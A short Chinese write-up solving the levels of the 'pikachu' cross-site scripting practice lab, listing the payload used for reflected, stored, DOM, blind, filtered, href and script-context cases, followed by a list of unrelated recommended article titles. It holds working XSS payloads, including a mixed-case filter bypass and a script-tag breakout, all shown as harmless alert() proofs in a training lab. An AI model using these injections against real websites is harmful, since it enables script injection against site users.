pikachu-XSS闯关挑战

get

复制代码
message=<script>alert("123")</script>&submit=submit

post

可以暴力破解账号密码,但由于是XSS练习,点右上角的提示,就可以登陆

直接在输入框中输入

复制代码
<script>alert("123")</script>

存储型

复制代码
<script>alert("123")</script>

DOM

随意输入可以看到提示

进入源码找到提示,将标签闭合

复制代码
' onclick="alert('123')"

xss-x

同样的语句,链接点两次

盲打

在留言板输入,发现没有变化,在提示中看到登陆后台

复制代码
<script>alert("456")</script>

在后台可以看到弹窗

过滤

输入发现被过滤

大小写混合,成功

复制代码
<SCriPt>alert("123")</sCrIPt>

html

可以看到源码时链接

输入

复制代码
javascript:alert(/xss/)

href

输入上一个,点击链接即可

js输出

看到源码是一个script语句,将前面的闭合,再写一个新的弹窗

复制代码
</script><script>alert("123")</script>
相关推荐
特立独行的猫a3 分钟前
Kuikly多端框架(KMP)实战:KMP中的 Ktor 网络库的多端适配指南
android·网络·harmonyos·ktor·compose·kmp·kuikly
那就回到过去20 分钟前
拥塞管理和拥塞避免
运维·服务器·网络·网络协议·tcp/ip·ensp
乐悲蔚蓝湖36 分钟前
华三做流量统计
网络
米羊1211 小时前
风险评估文档记录
开发语言·网络·php
切糕师学AI2 小时前
NFS(网络文件系统)详解
开发语言·网络·php
学习3人组2 小时前
_cdecl_stdcall_fastcall 三种函数调用约定
网络
DeskUI~~2 小时前
操作系统保密柜安全吗?
安全
之歆3 小时前
Linux 网络配置与 TCP/IP 协议
linux·网络·tcp/ip
Turboex邮件分享3 小时前
邮件队列堵塞的深度排查与紧急清空/重定向实战
运维·网络
了不起的云计算V4 小时前
2026年信创替代关键期:如何选真正“安全好用”的电脑?
人工智能·安全·电脑